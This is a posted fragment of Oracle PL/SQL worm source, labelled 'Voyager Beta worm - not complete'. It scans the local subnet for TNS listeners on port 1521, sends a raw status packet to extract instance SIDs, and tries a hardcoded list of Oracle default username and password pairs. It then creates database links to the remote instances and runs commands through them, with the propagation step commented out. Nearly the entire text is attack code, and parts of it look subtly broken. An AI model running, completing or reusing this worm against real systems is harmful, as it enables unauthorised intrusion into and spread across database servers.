Voyager Beta worm - not complete - maybe someone else has time to look at it set serveroutput on set verify off DECLARE i1 INTEGER; i2 INTEGER; iHostToSearchFor INTEGER; current_ipaddress VARCHAR2(100); current_network VARCHAR2(100); current_letter VARCHAR2(1); c UTL_TCP.CONNECTION; ln integer; vLen NUMBER; PreviousSID varchar2(100); vRequest varchar2(500); vResp varchar2(32767); vRespPiece varchar2(200); vRespTemp varchar2(200); ret_val pls_integer; BEGIN current_ipaddress := utl_inaddr.get_host_address; ln := length(current_ipaddress); loop current_letter := substr(current_ipaddress, ln, 1); ln := ln - 1; EXIT WHEN current_letter = '.'; EXIT WHEN ln = 0; end loop; current_network := substr(current_ipaddress, 1, ln); dbms_output.put_line( 'network to search: ' || current_network ); dbms_output.put_line( 'starting: ' || to_char(sysdate, 'MI:SS') ); iHostToSearchFor := 220; vRequest := chr(0) || chr(89) || chr(0) || chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) || chr(127) || chr(255) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1) || chr(0) || chr(31) || chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(230) || chr(0) || chr(0) || chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || '(CONNECT_DATA=(COMMAND=status))'; loop begin vResp := ''; PreviousSID := ''; c := UTL_TCP.OPEN_CONNECTION(current_network || '.' || iHostToSearchFor, 1521); dbms_output.put_line( 'found live port @ ' || to_char(sysdate, 'MI:SS') || ' - ' || current_network || '.' || iHostToSearchFor); ret_val := UTL_TCP.WRITE_RAW(c, utl_raw.cast_to_raw(vRequest)); vLen := UTL_TCP.READ_RAW(c, vResp, 100 ); vRespPiece := utl_raw.cast_to_varchar2(utl_raw.substr(vResp, 43, 58)); vResp := vRespPiece; declare read_from_network varchar2(32000); length_read_from_network INTEGER; begin loop read_from_network := ''; length_read_from_network := UTL_TCP.READ_RAW(c, read_from_network, 100 ); read_from_network := utl_raw.cast_to_varchar2(utl_raw.substr(read_from_network, 1, length_read_from_network)); vResp := vResp || read_from_network; end loop; EXCEPTION when OTHERS then read_from_network := ''; end; -- look for INSTANCE_NAME= and then for ) -- dbms_output.put_line( substr( vResp, 1, 254) ); -- dbms_output.put_line( substr( vResp, 255, 254) ); -- dbms_output.put_line( substr( vResp, 510, 254) ); UTL_TCP.CLOSE_CONNECTION(c); declare i3 INTEGER; i4 INTEGER; sid varchar2(100); cur binary_integer; i binary_integer; procedure_to_spread varchar2(32000); create_link varchar2(500); begin i3 := 1; i4 := 1; loop i3 := instr(vResp, '(INSTANCE_NAME=', i3); exit when i3 = 0; i4 := instr(vResp, ')', i3); sid := substr( vResp, i3 + 15, i4 - (i3 + 15)); dbms_output.put_line( 'Found SID of ' || sid ); i3 := i3 + 1; begin if sid = PreviousSID or sid = 'PLSExtProc' or sid = 'extproc' then -- don't do anything dbms_output.put_line( 'Not trying the SID: ' || sid ); else dbms_output.put_line( 'Attacking the SID: ' || sid ); loop declare iLoop integer := 0; username1 varchar2(100); password1 varchar2(100); begin iLoop := iLoop + 1; exit when iLoop = 8; if iLoop = 1 then username1 := 'system'; password1 := 'manager'; else if iLoop = 2 then username1 := 'sys'; password1 := 'change_on_install'; else if iLoop = 3 then username1 := 'dbsnmp'; password1 := 'dbsnmp'; else if iLoop = 4 then username1 := 'outln'; password1 := 'outln'; else if iLoop = 5 then username1 := 'scott'; password1 := 'tiger'; else if iLoop = 6 then username1 := 'mdsys'; password1 := 'mdsys'; else if iLoop = 7 then username1 := 'ordcommon'; password1 := 'ordcommon'; end if; cur := dbms_sql.open_cursor; dbms_sql.parse(cur, 'drop database link xxx', dbms_sql.v7); i := dbms_sql.execute( cur ); create_link := 'CREATE DATABASE LINK xxx CONNECT TO ' || username1 || ' IDENTIFIED BY ' || password1 || ' USING ''(DESCRIPTION=(ADDRESS_LIST=(ADDRESS = (PROTOCOL = TCP)(HOST = ' || iHostToSearchFor || ')(PORT = 1521)))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=' || SID || ')))'; dbms_sql.parse(cur, create_link, dbms_sql.v7); i := dbms_sql.execute( cur ); dbms_sql.close_cursor(cur); cur := dbms_sql.open_cursor@xxx; -- dbms_sql.parse@xxx(cur, procedure_to_spread, dbms_sql.v7); -- i := dbms_sql.execute@xxx( cur ); dbms_sql.parse@xxx(cur, 'drop table x', dbms_sql.v7); i := dbms_sql.execute@xxx( cur ); dbms_sql.parse@xxx(cur, 'CREATE TABLE X (Y DATE)' , dbms_sql.v7); i := dbms_sql.execute@xxx( cur ); dbms_sql.close_cursor@xxx(cur); exception when others then DBMS_OUTPUT.PUT_LINE('failed creating a database link that worked '); end if; end loop; end if; PreviousSID := SID; end; end loop; end; EXCEPTION when utl_tcp.NETWORK_ERROR then DBMS_OUTPUT.PUT_LINE('nothing found @ ' || to_char(sysdate, 'MI:SS') || ' - ' || current_network || '.' || iHostToSearchFor); end; iHostToSearchFor := iHostToSearchFor - 1; EXIT WHEN iHostToSearchFor = 216; end loop; dbms_output.put_line( 'finished the loop @ ' || to_char(sysdate, 'MI:SS') ); END; / Concerned about your privacy? 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